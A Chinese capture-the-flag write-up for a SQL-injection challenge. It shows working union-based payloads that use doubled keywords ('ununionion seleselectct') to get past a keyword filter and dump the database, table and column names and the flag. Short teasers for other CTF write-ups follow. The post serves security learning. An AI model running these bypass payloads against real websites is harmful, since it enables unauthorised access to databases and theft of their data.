ctf論劍場注入題

2021-09-27 06:55:37 字數 1017 閱讀 6075

先測試單引號

'報錯(指的是內容不顯示 )

加上注釋

'--+不報錯

說明這樣是可以注入成功的

說明這是個普通的注入

然後試著測了一下字段數

'union select 1,2,3--+報錯

結果測試到1-10都報錯

然後跑了一下

'union--+不報錯

發現關鍵字被過濾

然後試了一下 發現 union、select、or都被過濾了

突破點是雙寫關鍵字繞過

爆資料庫

?id=-1'ununionion seleselectct 1,database(),3--+
爆表

?id=-1'ununionion seleselectct 1,group_concat(table_name),3 from infoorrmation _schema.tables where table_schema='web18'--+
爆欄位

?id=-1'ununionion seleselectct 1,group_concat(column_name),3 from infoorrmation _schema.columns where table_name='flag'--+
爆flag

?id=1 ununionion seleselectct 1,flag,3 from flag--+
結束

然後- -

秒不可言,萬能密碼直接爆出flag

CTF 論劍場 名偵探柯南

解壓後會發現乙個和另乙個壓縮包 開啟 發現是這個 用hxd分析一下這張通過搜尋 zip jpg。然後會發現這張裡有乙個png 所以判斷這張是乙個壓縮包 解壓出來 總感覺這個有問題 所以拖到hxd中進行分析 然後發現就是乙個正常的 然後我懷疑這個有一部分有所隱藏 所以我把拖到tweakpng 然後改一...

CTF 論劍場 web之 web2

進入題目,一看就是要寫指令碼的那種題2333 python指令碼如下 import requests url res requests.get url cookies res.cookies phpsessid 獲得session test res.content.decode split 1 sp...

CTF論劍場web題目(持續更新) WEB13

首先進入頁面,隨便提交乙個字元。發現提示錯誤,看了下原始碼也沒什麼有用的,那就抓包看一下 發現回包這裡有個base64的編碼,解碼發現是個flag,但是提交到平台上不對,所以想到了提交到一開始的地方 提示你還能更快嗎,好吧,我又試了有多種方法,但是最後還是只能向我並不會寫的指令碼妥協。大佬的指令碼如...